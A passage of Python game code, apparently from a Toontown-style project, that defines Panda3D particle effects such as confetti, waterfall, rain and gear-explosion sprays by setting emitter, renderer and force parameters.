p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/snow-particle")
p0.renderer.setColor(Vec4(1.00, 0.00, 0.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.025)
p0.renderer.setFinalXScale(0.05)
p0.renderer.setInitialYScale(0.025)
p0.renderer.setFinalYScale(0.05)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(6.0000)
p0.emitter.setAmplitudeSpread(0.7000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, -4.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.200)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(0.0000, 0.0000, -3.0000), LinearDistanceForce.FTONEOVERRSQUARED, 1.0000, 2.5308, 1)
force0.setActive(1)
f0.addForce(force0)
force1 = LinearVectorForce(Vec3(0.0000, 0.0000, 0.0000), 1.0000, 0)
force1.setActive(1)
f0.addForce(force1)
self.addForceGroup(f0)
@particle
def confetti(self):
self.reset()
self.setPos(0.000, 0.000, 0.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("DiscEmitter")
p0.setPoolSize(350)
p0.setBirthRate(0.0200)
p0.setLitterSize(5)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.7000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
#p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/spark")
#p0.renderer.addTextureFromFile('confetti.png')
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.0070)
p0.renderer.setFinalXScale(0.0500)
p0.renderer.setInitialYScale(0.0070)
p0.renderer.setFinalYScale(0.0500)
p0.renderer.setNonanimatedTheta(145.0080)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
#p0.renderer.getColorInterpolationManager().addSinusoid(0.0,0.60000002384185791,Vec4(1.0,0.0,0.0,1.0),Vec4(0.0,1.0,0.0,1.0),0.30000001192092896,1)
#p0.renderer.getColorInterpolationManager().addSinusoid(0.5,1.0,Vec4(0.0,0.0,1.0,1.0),Vec4(1.0,0.0,0.0,1.0),0.30000001192092896,1)
#p0.renderer.getColorInterpolationManager().addSinusoid(0.0,1.0,Vec4(1.0,0.0,0.0,1.0),Vec4(0.0,1.0,0.0,1.0),0.5,0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(1.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Disc parameters
p0.emitter.setRadius(0.0100)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('gravity')
# Force parameters
force0 = LinearJitterForce(5.0000, 0)
force0.setVectorMasks(1, 1, 1)
force0.setActive(1)
f0.addForce(force0)
force1 = LinearSinkForce(Point3(0.0000, 0.0000, -0.8000), LinearDistanceForce.FTONEOVERRSQUARED, 0.5000, 1.0000, 1)
force1.setVectorMasks(1, 1, 1)
force1.setActive(1)
f0.addForce(force1)
self.addForceGroup(f0)
@particle
def downsizeCloud(self):
self.reset()
self.setPos(0.000, 0.000, 0.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(100)
p0.setBirthRate(0.2000)
p0.setLitterSize(12)
p0.setLitterSpread(4)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.3000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/snow-particle")
p0.renderer.setColor(Vec4(1.00, 1.00, 0.00, 0.80))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.015)
p0.renderer.setFinalXScale(0.075)
p0.renderer.setInitialYScale(0.0075)
p0.renderer.setFinalYScale(0.055)
p0.renderer.setNonanimatedTheta(20.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(-1.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(2.70)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearJitterForce(14.5449, 0)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def synergyWaterfall(self):
self.reset()
self.setPos(0.000, 5.000, 2.300)
self.setHpr(0.000, -45.000, 0.000)
self.setScale(4.000, 4.000, 4.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("DiscEmitter")
p0.setPoolSize(50)
p0.setBirthRate(0.0500)
p0.setLitterSize(4)
p0.setLitterSpread(1)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.1000)
p0.factory.setLifespanSpread(0.1000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/dollar-sign")
p0.renderer.setColor(Vec4(0.00, 1.00, 0.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.2)
p0.renderer.setFinalXScale(0.2)
p0.renderer.setInitialYScale(0.2)
p0.renderer.setFinalYScale(0.2)
p0.renderer.setNonanimatedTheta(20.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(3.5000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, -3.0000, 0.0000))
# Disc parameters
p0.emitter.setRadius(0.2000)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearSinkForce(Point3(0.0000, 0.0000, -15.0000), LinearDistanceForce.FTONEOVERRSQUARED, 3.0400, 1.5000, 1)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def calculate(self):
self.reset()
self.setPos(0.000, 2.5, 3.5)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(30)
p0.setBirthRate(0.4000)
p0.setLitterSize(3)
p0.setLitterSpread(1)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.9000)
p0.factory.setLifespanSpread(0.2000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.3000)
p0.factory.setTerminalVelocityBase(8.0000)
p0.factory.setTerminalVelocitySpread(4.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAOUT)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/audit-plus")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.0000)
p0.renderer.setFinalXScale(0.400)
p0.renderer.setInitialYScale(0.0000)
p0.renderer.setFinalYScale(0.400)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(11.0000)
p0.emitter.setAmplitudeSpread(2.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, -2.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.5000)
self.addParticles(p0)
@particle
def freezeAssets(self):
self.reset()
self.setPos(0.000, 0.000, -0.200)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("DiscEmitter")
p0.setPoolSize(200)
p0.setBirthRate(0.0800)
p0.setLitterSize(7)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.7000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/snow-particle")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.064)
p0.renderer.setFinalXScale(0.001)
p0.renderer.setInitialYScale(0.064)
p0.renderer.setFinalYScale(0.001)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(8.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 5.0000))
# Disc parameters
p0.emitter.setRadius(0.4500)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearJitterForce(15.0000, 0)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def spriteFiredFlecks(self):
self.reset()
self.setPos(0.000, 0.000, 2.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(60)
p0.setBirthRate(0.200)
p0.setLitterSize(2)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.100)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHANONE)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/roll-o-dex")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.025)
p0.renderer.setFinalXScale(0.000)
p0.renderer.setInitialYScale(0.025)
p0.renderer.setFinalYScale(0.000)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(1.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 4.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, -4.0000))
# Sphere Volume parameters
p0.emitter.setRadius(1.5000)
self.addParticles(p0)
@particle
def smile(self):
self.reset()
self.setPos(0.0, 0.0, 2.000)
self.setHpr(85.000, 0.000, 90.000)
#self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SparkleParticleRenderer")
p0.setEmitter("RingEmitter")
p0.setPoolSize(400)
p0.setBirthRate(0.0200)
p0.setLitterSize(10)
p0.setLitterSpread(0)
p0.setSystemLifespan(1.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.0000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(200.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAOUT)
p0.renderer.setUserAlpha(1.00)
# Sparkle parameters
p0.renderer.setCenterColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setEdgeColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setBirthRadius(0.1000)
p0.renderer.setDeathRadius(0.0000)
p0.renderer.setLifeScale(SparkleParticleRenderer.SPNOSCALE)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(1.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 0.0000))
# Ring parameters
p0.emitter.setRadius(1.0000)
self.addParticles(p0)
@particle
def trickleLiquidate(self):
self.reset()
self.setPos(0.000, 0.000, -0.200)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(20)
p0.setBirthRate(0.0800)
p0.setLitterSize(3)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.4000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/raindrop")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.06)
p0.renderer.setFinalXScale(0.06)
p0.renderer.setInitialYScale(0.225)
p0.renderer.setFinalYScale(0.225)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(16.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 6.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.4500)
self.addParticles(p0)
@particle
def reorgSpray(self):
self.reset()
self.setPos(0.000, 5.700, 2.700)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
#p0.setRenderer("PointParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(150)
p0.setBirthRate(0.0500)
p0.setLitterSize(7)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.8000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/snow-particle")
p0.renderer.setColor(Vec4(1.00, 0.00, 0.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.003)
p0.renderer.setFinalXScale(0.009)
p0.renderer.setInitialYScale(0.003)
p0.renderer.setFinalYScale(0.009)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(3.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 6.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, -4.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.8900)
self.addParticles(p0)
@particle
def liquidate(self):
self.reset()
self.setPos(0.000, 0.000, -0.200)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(100)
p0.setBirthRate(0.0400)
p0.setLitterSize(3)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.4000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/raindrop")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.06)
p0.renderer.setFinalXScale(0.06)
p0.renderer.setInitialYScale(0.225)
p0.renderer.setFinalYScale(0.225)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(16.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 6.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.4500)
self.addParticles(p0)
@particle
def acidrain(self):
self.reset()
self.setPos(0.000, 0.000, -0.200)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(100)
p0.setBirthRate(0.0400)
p0.setLitterSize(3)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(0.4000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/raindrop")
p0.renderer.setColor(Vec4(0.00, 1.00, 0.00, 1.00))
p0.renderer.setXScaleFlag(1)
p0.renderer.setYScaleFlag(1)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.06)
p0.renderer.setFinalXScale(0.06)
p0.renderer.setInitialYScale(0.225)
p0.renderer.setFinalYScale(0.225)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(16.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, 0.0000, 6.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.4500)
self.addParticles(p0)
@particle
def mumboJumboSpray(self):
self.reset()
self.setPos(0.000, 4.000, 4.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 4.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(3)
p0.setBirthRate(0.3000)
p0.setLitterSize(1)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(1.900)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAOUT)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
p0.renderer.setIgnoreScale(1)
p0.renderer.setTextureFromNode("phase_3.5/models/props/suit-particles", "**/mumbojumbo-iron")
p0.renderer.setColor(Vec4(1.00, 1.00, 1.00, 1.00))
p0.renderer.setXScaleFlag(0)
p0.renderer.setYScaleFlag(0)
p0.renderer.setAnimAngleFlag(0)
p0.renderer.setInitialXScale(0.40)
p0.renderer.setFinalXScale(0.40)
p0.renderer.setInitialYScale(0.20)
p0.renderer.setFinalYScale(0.20)
p0.renderer.setNonanimatedTheta(0.0000)
p0.renderer.setAlphaBlendMethod(BaseParticleRenderer.PPBLENDLINEAR)
p0.renderer.setAlphaDisable(0)
# Emitter parameters
p0.emitter.setEmissionType(BaseParticleEmitter.ETRADIATE)
p0.emitter.setAmplitude(6.0000)
p0.emitter.setAmplitudeSpread(0.0000)
p0.emitter.setOffsetForce(Vec3(0.0000, 0.0000, 0.0000))
p0.emitter.setExplicitLaunchVector(Vec3(1.0000, 0.0000, 0.0000))
p0.emitter.setRadiateOrigin(Point3(0.0000, -9.0000, 0.0000))
# Sphere Volume parameters
p0.emitter.setRadius(0.7000)
self.addParticles(p0)
f0 = ForceGroup.ForceGroup('forces')
# Force parameters
force0 = LinearJitterForce(20.4636, 0)
force0.setActive(1)
f0.addForce(force0)
self.addForceGroup(f0)
@particle
def gearExplosionWide(self):
self.reset()
self.setPos(0.000, 0.000, 0.000)
self.setHpr(0.000, 0.000, 0.000)
self.setScale(1.000, 1.000, 1.000)
p0 = Particles.Particles('particles-1')
# Particles parameters
p0.setFactory("PointParticleFactory")
p0.setRenderer("SpriteParticleRenderer")
p0.setEmitter("SphereVolumeEmitter")
p0.setPoolSize(40)
p0.setBirthRate(0.1000)
p0.setLitterSize(40)
p0.setLitterSpread(0)
p0.setSystemLifespan(0.0000)
p0.setLocalVelocityFlag(1)
p0.setSystemGrowsOlderFlag(0)
# Factory parameters
p0.factory.setLifespanBase(4.2000)
p0.factory.setLifespanSpread(0.0000)
p0.factory.setMassBase(1.0000)
p0.factory.setMassSpread(0.0000)
p0.factory.setTerminalVelocityBase(400.0000)
p0.factory.setTerminalVelocitySpread(0.0000)
# Point factory parameters
# Renderer parameters
p0.renderer.setAlphaMode(BaseParticleRenderer.PRALPHAUSER)
p0.renderer.setUserAlpha(1.00)
# Sprite parameters
